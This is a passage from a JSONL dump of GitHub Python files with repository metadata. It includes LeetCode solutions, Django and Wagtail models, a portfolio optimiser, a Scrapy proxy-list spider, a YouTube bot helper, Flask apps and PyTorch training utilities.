l[i] = 'Fizz'\n for i in l5:\n if l[i] == 'Fizz':\n l[i] += 'Buzz'\n else:\n l[i] = 'Buzz'\n return l[1:]\n\n def fizzBuzz3(self, n):\n return ['Fizz' * (not i % 3) + 'Buzz' * (not i % 5) or str(i) for i in range(1, n + 1)]\n\n def fizzBuzz4(self, n):\n return ['FizzBuzz'[i % -3 & -4:i % -5 & 8 ^ 12] or repr(i) for i in range(1, n + 1)]\n\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/fizz-buzz.py","file_name":"fizz-buzz.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"34691959920","text":"from django.contrib.auth.models import User\nfrom django.core.management.base import BaseCommand\n\nfrom blog.models import Category, Article\n\n\nclass Command(BaseCommand):\n help = 'Populates the database with some testing data.'\n\n def handle(self, *args, **options):\n self.stdout.write(self.style.SUCCESS('Started database population process...'))\n\n if User.objects.filter(username=\"ali44\").exists():\n self.stdout.write(self.style.SUCCESS('Database has already been populated. Cancelling the operation.'))\n return\n\n # Create users\n ali = User.objects.create_user(username='ali44', password='really_strong_password123')\n ali.first_name = 'Ali'\n ali.last_name = 'Veli'\n ali.save()\n\n adnan = User.objects.create_user(username='adnan_', password='really_strong_password123')\n adnan.first_name = 'Adnan'\n adnan.last_name = 'Kaya'\n adnan.save()\n\n kaya = User.objects.create_user(username='kaya', password='really_strong_password123')\n kaya.first_name = 'Kaya'\n kaya.last_name = 'Ce'\n kaya.save()\n\n # Create categories\n system_administration = Category.objects.create(name='System administration')\n seo_optimization = Category.objects.create(name='SEO optimization')\n programming = Category.objects.create(name='Programming')\n\n # Create articles\n website_article = Article.objects.create(\n title='How to code and deploy a website?',\n author=ali,\n type='TU',\n content='There are numerous ways of how you can deploy a website...',\n )\n website_article.save()\n website_article.categories.add(programming, system_administration, seo_optimization)\n\n google_article = Article.objects.create(\n title='How to improve your Google rating?',\n author=adnan,\n type='TU',\n content='Firstly, add the correct SEO tags...',\n )\n google_article.save()\n google_article.categories.add(seo_optimization)\n\n programming_article = Article.objects.create(\n title='Which programming language is the best?',\n author=adnan,\n type='RS',\n content='The best programming languages are:\\n1) Python\\n2) Java\\n3) C/C++...',\n )\n programming_article.save()\n programming_article.categories.add(programming)\n\n ubuntu_article = Article.objects.create(\n title='Installing the latest version of Ubuntu',\n author=kaya,\n type='TU',\n content=\"In this tutorial, we'll take a look at how to setup the latest version of Ubuntu. Ubuntu \"\n \"(/ʊˈbʊntuː/ is a Linux distribution based on Debian and composed mostly of free and open-source\"\n \" software. Ubuntu is officially released in three editions: Desktop, Server, and Core for \"\n \"Internet of things devices and robots.\",\n )\n ubuntu_article.save()\n ubuntu_article.categories.add(system_administration)\n\n django_article = Article.objects.create(\n title='Django REST Framework and Elasticsearch',\n author=kaya,\n type='TU',\n content=\"In this tutorial, we'll look at how to integrate Django REST Framework with Elasticsearch. \"\n \"We'll use Django to model our data and DRF to serialize and serve it. Finally, we'll index the data \"\n \"with Elasticsearch and make it searchable.\",\n )\n django_article.save()\n django_article.categories.add(system_administration)\n\n self.stdout.write(self.style.SUCCESS('Successfully populated the database.'))","repo_name":"adnankaya/drf-elastic","sub_path":"blog/management/commands/populate_db.py","file_name":"populate_db.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"3270718061","text":"class Node:\n def __init__(self, start, end, double_booked):\n self.start = start\n self.end = end\n self.double_booked = double_booked\n self.left = None\n self.right = None\n\n def _check(self, node):\n if node.end <= self.start:\n if self.left:\n return self.left._check(node)\n return True\n if self.end <= node.start:\n if self.right:\n return self.right._check(node)\n return True\n if self.double_booked:\n return False\n checked = True\n if self.start != node.start:\n left_start = min(self.start, node.start)\n left_end = max(self.start, node.start)\n left_node = Node(left_start, left_end, False)\n if self.left: \n checked &= self.left._check(left_node)\n if self.end != node.end:\n right_start = min(self.end, node.end)\n right_end = max(self.end, node.end)\n right_node = Node(right_start, right_end, False)\n if self.right:\n checked &= self.right._check(right_node)\n return checked\n\n\n def insert(self, node):\n if self._check(node):\n self._insert(node)\n return True\n return False\n\n def _insert(self, node):\n if node.end <= self.start:\n if self.left:\n self.left.insert(node)\n else:\n self.left = node\n elif self.end <= node.start:\n if self.right:\n self.right.insert(node)\n else:\n self.right = node\n else:\n if self.start != node.start:\n left_start = min(self.start, node.start)\n left_end = max(self.start, node.start)\n left_node = Node(left_start, left_end, False)\n if self.left:\n self.left.insert(left_node)\n else:\n self.left = left_node\n if self.end != node.end:\n right_start = min(self.end, node.end)\n right_end = max(self.end, node.end)\n right_node = Node(right_start, right_end, False)\n if self.right:\n self.right.insert(right_node)\n else:\n self.right = right_node\n self.start = max(self.start, node.start)\n self.end = min(self.end, node.end)\n self.double_booked = True\n\n\nclass MyCalendarTwo:\n\n def __init__(self):\n self.root = None\n\n def book(self, start: int, end: int) -> bool:\n node = Node(start, end, False)\n if not self.root:\n self.root = node\n return True\n return self.root.insert(node)\n\n\n# Your MyCalendarTwo object will be instantiated and called as such:\n# obj = MyCalendarTwo()\n# param_1 = obj.book(start,end)\n","repo_name":"bolatov/leetcode","sub_path":"0731_my-calendar-ii.py","file_name":"0731_my-calendar-ii.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6388481854","text":"from django.db import models\nfrom django.conf import settings\nfrom wagtail.core.models import Page\nfrom wagtail.core.fields import StreamField\nfrom wagtail.core import blocks\nfrom wagtail.images.blocks import ImageChooserBlock\nfrom wagtail.documents.blocks import DocumentChooserBlock\nfrom wagtail.admin.edit_handlers import StreamFieldPanel, FieldPanel\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.embeds.blocks import EmbedBlock\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.core.signals import page_published\nfrom mainapp.blocks import TwoColumnBlock, HeadingBlock\nfrom discord import Webhook, RequestsWebhookAdapter, Embed\nfrom datetime import datetime, timedelta\nimport locale\nimport os\n\nif os.name == 'nt':\n locale.setlocale(locale.LC_TIME, \"fr-FR\")\nelse:\n locale.setlocale(locale.LC_TIME, \"fr_FR\")\n\n# Create your models here.\nclass ArticlePage(Page):\n \"\"\"ArticlePage model using to represent any Article on the site\"\"\"\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n description = models.CharField(max_length=255)\n body = StreamField([\n ('heading', HeadingBlock(classname=\"full title\")),\n ('paragraph', blocks.RichTextBlock()),\n ('image', ImageChooserBlock()),\n ('two_columns', TwoColumnBlock()),\n ('embedded_video', EmbedBlock(icon=\"media\")),\n ('document', DocumentChooserBlock()),\n ('raw_html', blocks.RawHTMLBlock()),\n ],null=True,blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel('description'),\n StreamFieldPanel('body'),\n ]\n\n promote_panels = [\n ImageChooserPanel('feed_image'),\n ]\n\n @property\n def article_page(self):\n return self.get_parent().specific\n\n def get_context(self, request, *args, **kwargs):\n context = super(ArticlePage, self).get_context(request, *args, **kwargs)\n context['article_page'] = self.article_page\n return context\n\nclass GuidePage(Page):\n \"\"\"GuidePage model using to represent any Guide on the site\"\"\"\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n description = models.CharField(max_length=255)\n body = StreamField([\n ('heading', HeadingBlock(classname=\"full title\")),\n ('paragraph', blocks.RichTextBlock()),\n ('image', ImageChooserBlock()),\n ('two_columns', TwoColumnBlock()),\n ('embedded_video', EmbedBlock(icon=\"media\")),\n ('document', DocumentChooserBlock()),\n ('raw_html', blocks.RawHTMLBlock()),\n ],null=True,blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel('description'),\n StreamFieldPanel('body'),\n ]\n\n promote_panels = [\n ImageChooserPanel('feed_image'),\n ]\n\n @property\n def guide_page(self):\n return self.get_parent().specific\n\n def get_context(self, request, *args, **kwargs):\n context = super(GuidePage, self).get_context(request, *args, **kwargs)\n context['guide_page'] = self.guide_page\n return context\n\nclass AnswerPage(Page):\n \"\"\"AnswerPage model using to represent any Answer in FAQ page on the site\"\"\"\n body = RichTextField()\n\n content_panels = Page.content_panels + [\n FieldPanel('body'),\n ]\n\n @property\n def answer_page(self):\n return self.get_parent().specific\n\n def get_context(self, request, *args, **kwargs):\n context = super(AnswerPage, self).get_context(request, *args, **kwargs)\n context['answer_page'] = self.answer_page\n return context\n\nclass HomePage(Page):\n \"\"\"HomePage model using as root directory for the other pages directory\"\"\"\n subpage_types = ['ArticlesPage', 'GuidesPage', 'FAQPage']\n\nclass ArticlesPage(Page):\n \"\"\"ArticlesPage model using ArticlePage directory\"\"\"\n subpage_types = ['ArticlePage']\n\nclass GuidesPage(Page):\n \"\"\"GuidesPage model using GuidePage directory\"\"\"\n subpage_types = ['GuidePage']\n\nclass FAQPage(Page):\n \"\"\"FAQPage model using AnswerPage directory\"\"\"\n subpage_types = ['AnswerPage']\n\ndef send_to_discord(sender, **kwargs):\n # Let everyone know when a new page is published using Discord Webhook\n if settings.DEBUG or settings.TESTING:\n return\n \n page = kwargs['instance']\n\n # First published check\n if page.first_published_at != page.last_published_at:\n return\n if page.get_parent().title not in ['Articles']:\n return\n\n webhook = Webhook.partial(settings.DISCORD_WEBHOOK_ID, settings.DISCORD_WEBHOOK_TOKEN, adapter=RequestsWebhookAdapter())\n embed = Embed(type=\"rich\", description='{}'.format(page.description), colour=0x90E050)\n embed.set_author(name=page.title, url='https://{}{}'.format(settings.SITE_NAME, page.url), icon_url=\"https://i.imgur.com/9UsXLG0.png\")\n if page.articlepage.feed_image:\n embed.set_thumbnail(url='https://{}{}'.format(settings.SITE_NAME, page.articlepage.feed_image.get_rendition('fill-800x600').url))\n embed.set_footer(text='{} | {}'.format(page.owner.username, (page.first_published_at).strftime('%A %d %B - %H:%M').title()))\n webhook.send(username='Fortnite STW FR', embed=embed)\n\n# Register a receiver\npage_published.connect(send_to_discord)","repo_name":"Hideky/Fortnite-STW","sub_path":"mainapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1628370836","text":"\nimport yfinance as yf\nimport numpy as np\nfrom scipy.optimize import minimize\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n#Get the stock data from yfinance\n#stock_tickers = ['AAPL', 'MSFT', 'GOOG', 'AMZN', 'META', 'BABA', 'BRK-B', 'TCEHY', 'JPM', 'V'] #2019Q4\nstock_tickers = ['AAPL', 'MSFT', 'GOOG', 'AMZN', 'TSLA', 'META', 'NVDA', 'BRK-B', 'TSM', 'TCEHY']#2021Q4\n\nstart_date = '2021-01-01'\nmid_date = '2021-12-31'\nend_date = '2022-12-31'\n#stock_data = yf.download(stock_tickers, start=start_date, end=end_date)['Adj Close']\nstock_data = pd.read_csv('stock_data2021-2022.csv', index_col=0)\n#%%\n\nind_returns = pd.DataFrame(np.log(stock_data.loc[start_date: mid_date] / stock_data.loc[start_date: mid_date].shift(1)))\n#ind_returns = (ind_returns - ind_returns.mean()) / ind_returns.std()\n\nind_returns.plot(figsize=(15,12), subplots=True, layout=(4,3))\nind_returns.hist(figsize=(15,12), bins=50)\n\n#Calaulte returns/risk \nret_std = ind_returns.mean()*252 / (ind_returns.std()*(252**0.5))\n\n#%%\n#Calculate the returns and covariance matrix\nreturns = ind_returns.mean() * 252\ncov_matrix = ind_returns.cov()*252\n\nprint('returns: ', returns)\nprint('covariance matrix: ', cov_matrix)\n\n\n#%%\ndef portfolio_objective(weights, returns, cov_matrix, risk_aversion=0.5):\n portfolio_return = np.sum(weights * returns)\n portfolio_variance = np.dot(weights.T, np.dot(cov_matrix, weights))\n #objective = portfolio_return - risk_aversion * portfolio_variance\n objective = portfolio_return / (portfolio_variance**0.5)\n return -objective\n\ndef maximize_mean_variance_utility(returns, cov_matrix, risk_aversion=0.5):\n num_assets = returns.shape[0]\n initial_weights = np.ones(num_assets) / num_assets\n constraints = ({'type': 'eq', 'fun': lambda x: 1-np.sum(x)})\n bounds = [(0, 1) for i in range(num_assets)]\n result = minimize(portfolio_objective, initial_weights, args=(returns, cov_matrix, risk_aversion),\n method='SLSQP', constraints=constraints, bounds=bounds)\n #min method: 'L-BFGS-B' 'trust-constr' 'SLSQP' 'Newton-CG’\n return result.x\n\nrisk_aversion = 0.5\nMVO_weights = maximize_mean_variance_utility(returns, cov_matrix, risk_aversion)\n\n\n#%%\n# Get the price data of SPY and the portfolio\n\nbenchmark_data = yf.download('SPY', start=mid_date, end=end_date)['Adj Close']\n#portfolio_data = (stock_data[stock_tickers].loc[mid_date:end_date] @ MVO_weights).to_frame()\nportfolio_data = (stock_data.loc[mid_date:end_date] @ MVO_weights).to_frame()\new_portfolio = (stock_data.loc[mid_date:end_date] @ (np.ones(len(stock_tickers))/len(stock_tickers))).to_frame()\n\n#%%\n# Calculate the daily returns\nbenchmark_returns = pd.DataFrame(np.log(benchmark_data / benchmark_data.shift(1)))\nportfolio_returns = pd.DataFrame(np.log(portfolio_data / portfolio_data.shift(1)))\new_returns = pd.DataFrame(np.log(ew_portfolio / ew_portfolio.shift(1)))\n\n#calculate sharpe ratio\nbenchmark_sharpe = benchmark_returns.mean()*252 / (benchmark_returns.std()*(252**0.5))\nportfolio_sharpe = portfolio_returns.mean()*252 / (portfolio_returns.std()*(252**0.5))\new_sharpe = ew_returns.mean()*252 / (ew_returns.std()*(252**0.5))\n \n#calculate cumulative returns \ncum_benchmark = (benchmark_returns+1).cumprod()\ncum_benchmark.columns=['SPY']\ncum_portfolio = (portfolio_returns+1).cumprod()\ncum_portfolio.columns=['MVO portfolio']\ncum_ew = (ew_returns+1).cumprod()\ncum_ew.columns=['Equally weighted']\n\ndf = pd.concat([cum_benchmark, cum_portfolio, cum_ew], axis=1)\n# Plot the cumulative returns\ncum_return_plot = df.plot(figsize=(15,12), title='Cumulative Returns: MVO portfolio v.s. SPY v.s. Equally weighted portfolio\\n'+mid_date+' to '+end_date)\ncum_return_plot.set_ylabel('Cumulative Returns')\n#plt.plot(benchmark_returns, label='Nasdaq 100')\n#plt.plot(portfolio_returns, label='MVO Portfolio')\n#plt.show()\n","repo_name":"litingtang/mean_variance_optimization","sub_path":"MVO.py","file_name":"MVO.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15920779458","text":"import re\n\n\ndef find_my_pattern(input):\n\t\"\"\" Find a number as a form nn nnn\"\"\"\n\tregex = re.compile(r'(\\d{2}) (\\d{3})')\n\toutput = regex.findall(input)\n\treturn output\n\n\na = find_my_pattern('My first numper is 22 333 but friend of mine has 32 433 phone number')\nprint(a)","repo_name":"margolek/python-sorted-by-topics","sub_path":"Regex/match_number.py","file_name":"match_number.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6260230883","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom ..items import ZtestItem\nimport time\n\n\nclass ExampleSpider(scrapy.Spider):\n name = 'xici'\n allowed_domains = ['xicidaili.com']\n start_urls = ['http://www.xicidaili.com/nn/1']\n\n def start_requests(self):\n reqs = []\n\n for i in range(1, 2):\n req = scrapy.Request('http://www.xicidaili.com/nn/%s'%i)\n reqs.append(req)\n\n return reqs\n\n\n def parse(self, response):\n ip_table = response.xpath('//*[@id=\"ip_list\"]/tr')\n # trs = ip_table.xpath('tr')\n # print(trs)\n for tr in ip_table[1:]:\n item = ZtestItem()\n item['ip'] = tr.xpath('td[2]/text()')[0].extract()\n print(item['ip'])\n item['port'] = tr.xpath('td[3]/text()')[0].extract()\n print(item['port'])\n item['address'] = tr.xpath('string(td[4])')[0].extract().strip()\n print(item['address'])\n item['httptype'] = tr.xpath('string(td[6])')[0].extract()\n print(item['httptype'])\n item['speed'] = tr.xpath('td[7]/div[@class=\"bar\"]/@title')[0].extract()\n print(item['speed'])\n item['survival_time'] = tr.xpath('td[9]/text()')[0].extract()\n print(item['survival_time'])\n item['check_time'] = tr.xpath('td[10]/text()')[0].extract()\n print(item['check_time'])\n yield item\n","repo_name":"Reluxer/study-notes","sub_path":"python/spider/ztest/ztest/spiders/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"30258447089","text":"import asyncio\nimport logging\nfrom collections.abc import Awaitable\nfrom datetime import timedelta\nfrom enum import Enum\nfrom functools import cached_property\nfrom typing import Any, Self, TypedDict\n\nfrom pytube import Search\nfrom yt_dlp import YoutubeDL\n\n\nclass Track:\n def __init__(self, title: str, url: str, thumbnail: str, duration_seconds: int):\n self._title = title\n self._url = url\n self._thumbnail = thumbnail\n self._duration_seconds = duration_seconds\n\n @property\n def title(self) -> str:\n return self._title\n\n @property\n def url(self) -> str:\n return self._url\n\n @property\n def thumbnail(self) -> str:\n return self._thumbnail\n\n @cached_property\n def duration(self) -> timedelta:\n return timedelta(seconds=self._duration_seconds)\n\n\nclass SearchDataType(Enum):\n TRACK = 1\n PLAYLIST = 2\n\n\nclass SearchData(TypedDict):\n type: SearchDataType\n title: str\n thumbnail: str\n length: int\n url: str\n\n\nclass YouTube:\n logger = logging.getLogger(\"handlers.YouTube\")\n yt_dl = YoutubeDL(\n {\n \"format\": \"bestaudio\",\n \"default_search\": \"ytsearch\",\n \"logger\": logger.getChild(\"YoutubeDL\"),\n \"extract_flat\": \"in_playlist\",\n }\n )\n\n @staticmethod\n def _generate_thumbnail_url(video_id: str) -> str:\n return f\"https://i.ytimg.com/vi/{video_id}/maxresdefault.jpg\"\n\n def __init__(self: Self):\n pass\n\n @classmethod\n async def _process_video(cls, info: Any) -> Track:\n return Track(\n title=info[\"title\"],\n url=info[\"url\"],\n thumbnail=cls._generate_thumbnail_url(info[\"id\"]),\n duration_seconds=info[\"duration\"],\n )\n\n @classmethod\n async def _process_playlist_video(cls, url: str) -> Track:\n info = await asyncio.to_thread(cls.yt_dl.extract_info, url=url, download=False)\n\n return await cls._process_video(info)\n\n @classmethod\n async def search_tracks(\n cls, query: str\n ) -> tuple[list[Awaitable[Track]], SearchData]:\n info = await asyncio.to_thread(\n cls.yt_dl.extract_info, url=query, download=False\n )\n\n tracks = (\n [\n asyncio.create_task(cls._process_playlist_video(v[\"url\"]))\n for v in info[\"entries\"]\n ]\n if \"entries\" in info\n else [cls._process_video(info)]\n )\n\n data = {\n \"title\": info[\"entries\"][0][\"title\"]\n if \"entries\" in info and len(info[\"entries\"]) == 1\n else info[\"title\"],\n \"thumbnail\": cls._generate_thumbnail_url(info[\"entries\"][0][\"id\"])\n if \"entries\" in info\n else info[\"thumbnail\"],\n **(\n (\n {\n \"type\": SearchDataType.PLAYLIST,\n \"length\": len(info[\"entries\"]),\n \"url\": info[\"webpage_url\"],\n }\n if len(info[\"entries\"]) > 1\n else {\n \"type\": SearchDataType.TRACK,\n \"length\": info[\"entries\"][0][\"duration\"],\n \"url\": info[\"entries\"][0][\"url\"],\n }\n )\n if \"entries\" in info\n else {\n \"type\": SearchDataType.TRACK,\n \"length\": info[\"duration\"],\n \"url\": info[\"webpage_url\"],\n }\n ),\n }\n\n return tracks, data\n\n @classmethod\n def get_autocompletes(cls, query: str) -> list[str]:\n # TODO: Find a way to use yt-dlp\n\n if query is None or query == \"\":\n return []\n\n # TODO: Clean\n logger = cls.logger.getChild(\"get_autocompletes\")\n logger.info(f\"Autocompleting {query}\")\n search = Search(query)\n # suggestions = search.completion_suggestions\n results = map(lambda r: r.title, search.results[:10])\n autocompletes = [*results]\n # autocompletes = [*(results or []), *(suggestions or [])]\n logger.info(f\"Suggestions: {autocompletes}\")\n\n return autocompletes\n","repo_name":"OwenJPage/snorm-bot","sub_path":"lib/handlers/YouTube.py","file_name":"YouTube.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30200792257","text":"from flask import Blueprint, session, request, jsonify\n\nfrom backend.api import getLinks, cadastroLink\nfrom backend.routes import get_blueprint_name, API_BASE_NAME\nfrom backend.utils.decorators import is_logged_in\nfrom backend.utils.responses import success_response, error_response\n\napi_links_blueprint = Blueprint(get_blueprint_name(API_BASE_NAME, \"links\"), __name__)\n\n\n@api_links_blueprint.route(\"/api/links/\")\n@is_logged_in\ndef apiLinks(id_disciplina):\n data = getLinks(id_disciplina)\n return jsonify(data)\n\n\n@api_links_blueprint.route(\"/api/cadastro/link\", methods=[\"POST\"])\n@is_logged_in\ndef apiCadastroLink():\n r = request.get_json()\n\n id_disciplina = r.get(\"id_disciplina\")\n titulo = r.get(\"titulo\")\n link = r.get(\"link\")\n id_user = session.get(\"id\")\n\n success, message = cadastroLink(id_user, id_disciplina, titulo, link)\n if success:\n return success_response()\n else:\n return error_response(message)\n","repo_name":"vfrezende/Penoso-ou-Mamaozinho-2.0","sub_path":"backend/routes/api/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"15836353655","text":"from flask import Flask, render_template,flash,redirect, url_for\nimport os\nimport glob\nfrom flask import send_file\nfrom fileinput import filename\nfrom flask import request\n\nimport myModule\n \napp = Flask(__name__)\napp.secret_key = \"super secret key\"\nupload_path='static/uploaded file/'\nmerge_path='static/merged file/' \n \n# @app.route(\"/\")\n# def index():\n# return render_template(\"layout.html\")\n\n \n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n \n\n\n@app.route('/load-file',methods=['POST'])\ndef load_file():\n if request.method == 'POST':\n res=myModule.clearPath(upload_path) \n if(res!=True):\n return \"Error in clearing uploaded file path\" \n res=myModule.clearPath(merge_path) \n if(res!=True):\n return \"Error in clearing uploaded file path\" \n\n files = request.files.getlist('file[]')\n uploaded_file_names=[]\n extension=['.xlsx']\n\n\n for file in files:\n file_name=file.filename #name\n \n if file_name != '':\n file_extension = myModule.getExtension(file_name)\n\n if file_extension not in extension:\n flash('Invalid Extension','bg-danger')\n return redirect(url_for('home'))\n else:\n try:\n file.save(upload_path+file.filename) #uploaded\n uploaded_file_names.append(file_name)\n except:\n flash('Error in file uploading')\n return redirect(url_for('home'))\n else:\n flash('Invalid File','bg-danger')\n return redirect(url_for('home'))\n \n if(len(uploaded_file_names)):\n new_semester=myModule.mergeUploadedFile(uploaded_file_names)\n new_semester.to_csv(merge_path+\"new_semester.csv\",index=False)\n flash('System Loaded Successfully','bg-success')\n return redirect(url_for('loaded_file'))\n\n\n\n@app.route(\"/loaded-file\")\ndef loaded_file():\n file_path = glob.glob(upload_path+'*')\n file_names=[]\n try:\n for f in file_path:\n file_names.append(f)\n return render_template(\"loaded_file.html\",files=file_names)\n except:\n return render_template(\"loaded_file.html\")\n\n\n@app.route(\"/get-attendance\")\ndef get_attendance():\n return render_template(\"find_attendance.html\")\n\n@app.route(\"/find-attendance\",methods=['POST'])\ndef find_attendance():\n if request.method == 'POST':\n res=myModule.isLoaded()\n if(res!=True):\n flash('System not Loaded','bg-danger')\n return redirect(url_for('home'))\n\n student_id = request.form['student_id']\n attendance=myModule.getAttendance(student_id)\n attendance=attendance.to_dict('records')\n # return attendance\n return render_template(\"find_attendance.html\",attendance=attendance,student_id=student_id)\n\n@app.route('/demo-download')\ndef demo_download():\n return send_file(\n 'static/demo/demo.xlsx',\n mimetype='text/xlsx',\n download_name='demo.xlsx',\n as_attachment=True\n )\n@app.route('/reset-system')\ndef reset_system():\n res=myModule.clearPath(upload_path) \n if(res!=True):\n return \"Error in clearing uploaded file path\" \n res=myModule.clearPath(merge_path) \n if(res!=True):\n return \"Error in clearing uploaded file path\" \n flash('System Reseted Successfully','bg-success')\n return redirect(url_for('loaded_file'))\n\n\n\n\n \n\n\n@app.errorhandler(404)\ndef not_found(error):\n return render_template('error.html'), 404\n\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"asad-cuet/Semester-Attendance-V1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"24278071377","text":"# Helper functions for train.py and predict.py\n\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms, models\nfrom collections import OrderedDict\nfrom PIL import Image\n\nimport json\nimport torch\nimport os.path\nimport numpy as np\n\n\n# <---train.py start--->\ndef import_data(data_dir, batch_size, arch):\n \"\"\"\n Loads a dataset from a directory and performs preproccessing, normalization,\n and training data augmentation.\n\n The data directory must have sub folders \"train\", \"valid, and \"test\" containing\n the necessary classes/data. See PyTorch datasets.ImageFolder for more info.\n\n Args:\n data_dir: Directory path of model data (string)\n batch_size: Training batch size (int)\n arch: PyTorch architecture to use for transfer learning from torchvision.models (string)\n\n Returns:\n Model ready training, validation, test, and class to index mappings data\n as a tuple of PyTorch Dataloader objects\n IE: (train, val, test, class_to_indexes)\n \"\"\"\n\n # PyTorch model normalization and standard deviation values\n # https://pytorch.org/docs/stable/torchvision/models.html\n mean=[0.485, 0.456, 0.406]\n std=[0.229, 0.224, 0.225]\n\n # Determine the min image size for diffrent classifier models\n if arch == 'inception_v3': # Inception needs 299px despite documentation listing 224px\n model_size = 299\n else:\n model_size = 224\n\n # Directory information split\n train_dir = data_dir + '/train'\n valid_dir = data_dir + '/valid'\n test_dir = data_dir + '/test'\n\n # Perform data augmentation in addition to resizing and normalizing training data\n train_transforms = transforms.Compose([transforms.RandomRotation(30),\n transforms.RandomHorizontalFlip(),\n transforms.RandomVerticalFlip(),\n transforms.RandomResizedCrop(model_size),\n transforms.ToTensor(), # <-- Needed to convert PIL images to pytorch tensors\n transforms.Normalize(mean=mean, std=std)])\n\n # Just resize and normalize validation and testing data\n test_val_transforms = transforms.Compose([transforms.Resize((model_size, model_size)),\n transforms.ToTensor(),\n transforms.Normalize(mean=mean, std=std)])\n\n # Load the datasets with ImageFolder\n train_dataset = datasets.ImageFolder(train_dir, transform=train_transforms)\n val_dataset = datasets.ImageFolder(valid_dir, transform=test_val_transforms)\n test_dataset = datasets.ImageFolder(test_dir, transform=test_val_transforms)\n\n # Using the image datasets and the transforms, define the dataloaders\n train_data = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\n val_data = DataLoader(val_dataset, batch_size=batch_size, shuffle=True)\n test_data = DataLoader(test_dataset, batch_size=batch_size, shuffle=True)\n\n return train_data, val_data, test_data, train_dataset.class_to_idx\n\ndef get_category_names(file):\n \"\"\"\n Gets category names from a json file.\n\n Args:\n file: file containing category class:name mappings (json file)\n\n Returns:\n Python dictionary of class:names\n IE: {'1':'name'}\n \"\"\"\n\n # Open the file and return a python dict\n with open(file, 'r') as f:\n cat_to_name = json.load(f)\n\n return cat_to_name\n\ndef build_model(arch, hidden_units, learn_rate):\n \"\"\"\n Builds a PyTorch transfer learning model as specified.\n\n Args:\n arch: PyTorch architecture to be used for transfer learning (string)\n hidden_units: number of hidden units for the fully connected layers (int)\n learn_rate: the learning rate to be used with the model for training (float)\n\n Returns:\n A PyTorch transfer learning model with a new user defined classifer ready for training and\n a equally prepared optimzer as tuple\n IE: (model, optimizer)\n \"\"\"\n\n # Download the architecture selected\n model = getattr(models, arch)(pretrained=True)\n\n # Freeze weights to reuse with new classifier for transfer learning\n for parameter in model.parameters():\n parameter.requires_grad = False\n\n # Identify the classifier so it can be replaced with the user's specification\n possible_classifier_matches = []\n for name, layer in model.named_children():\n if isinstance(layer, torch.nn.modules.linear.Linear) or isinstance(layer, torch.nn.modules.container.Sequential):\n possible_classifier_matches.append((name, layer))\n\n # Get the last match to get the name of the classifier for replacement\n classifier = possible_classifier_matches[-1]\n c_name = classifier[0]\n c_layer = classifier [1]\n\n # Get the classifiers input dimensions to so a new model can be built\n # Find the first linear layer if its a sequential module, otherwise just get the linear layer input features\n if isinstance(c_layer, torch.nn.modules.container.Sequential):\n for layer in c_layer:\n try:\n in_features = layer.in_features\n break\n except AttributeError:\n pass\n else:\n in_features = getattr(model, c_name).in_features\n\n # Define a new classifier using the inputed parameters\n new_classifier = torch.nn.Sequential(OrderedDict([\n ('fc1', torch.nn.Linear(in_features, hidden_units)),\n ('relu1', torch.nn.ReLU()),\n ('dropout1', torch.nn.Dropout(p=0.5)),\n ('fc2', torch.nn.Linear(hidden_units, 102))\n ]))\n\n # Replace the classifier with the user defined\n setattr(model, c_name, new_classifier)\n\n # Now that the model is prepared set up an optimizer with the new classifier configured\n # Only pass the optimizer the NEW classifier weights\n # IE: \"model.NEW_LAYERS.parameters()\"\n # model.parameters() returns all trainable pytorch parameters like weights and biases\n optimizer = torch.optim.Adam(getattr(model, c_name).parameters(), lr=learn_rate)\n\n return model, optimizer\n\ndef validation(model, data, criterion, device):\n \"\"\"\n Computes the accuracy and loss of a model.\n\n Args:\n model: pytorch model\n data: validation or testing data (Dataloader object)\n criterion: loss function being used\n device: device used for pytorch training ('cuda:0' or 'cpu')\n\n Returns:\n Model loss and model accuracy as a tuple\n IE: (loss, accuracy)\n \"\"\"\n\n # Keep track of the validation loss and accuracy\n val_loss = 0\n val_accuracy = 0\n\n # Loop through the data in batches\n for images, labels in data:\n # Send the training data to the designated device for computation\n images, labels = images.to(device), labels.to(device)\n\n # Forward pass, when not in training mode aux_logits is not returned\n outputs = model.forward(images)\n\n # Get the probabilites from the 